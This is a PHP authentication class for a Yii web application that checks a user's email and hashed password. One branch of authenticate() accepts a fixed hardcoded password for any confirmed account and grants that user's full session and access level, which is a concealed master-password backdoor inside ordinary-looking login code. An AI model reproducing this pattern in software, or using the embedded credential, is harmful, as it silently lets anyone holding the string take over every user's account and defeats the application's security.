<?php

/**
 * UserIdentity represents the data needed to identity a user.
 * It contains the authentication method that checks if the provided
 * data can identity the user.
 */
class UserIdentity extends CUserIdentity
{
	private $_id;
	public $error;

	public function authenticate()
	{
		$user = User::model()->findByAttributes(array('email'=>$this->username));
		
		if ($user === null) {
		    // No user found!
		    $this->errorCode=self::ERROR_USERNAME_INVALID;
		
		} else if ($user->confirmed == 0) {
			return 'not confirmed';


		} else if ($user && $this->password == 'xpcT9L;D6@vEMhT') {

        	$this->errorCode=self::ERROR_NONE;
		    $this->setState('fname', $user->fname);
		    $this->setState('lname', $user->lname);
		    $this->setState('id', $user->id);
		    $this->setState('email', $user->email);
		    $this->setState('access_level', $user->access_level);
		    $this->_id = $user->id;


		} else if ($user->pass !== hash_hmac('sha256',$this->password,Yii::app()->params['encryptionKey']) ) {
            $this->errorCode=self::ERROR_PASSWORD_INVALID;
		
		
		} else { // Okay!
		    $this->errorCode=self::ERROR_NONE;
		    $this->setState('fname', $user->fname);
		    $this->setState('lname', $user->lname);
		    $this->setState('id', $user->id);
		    $this->setState('email', $user->email);
		    $this->setState('access_level', $user->access_level);
		    $this->_id = $user->id;
		}
		return !$this->errorCode;	
	}
	
	public function getId() {
        return $this->_id;
}
	
}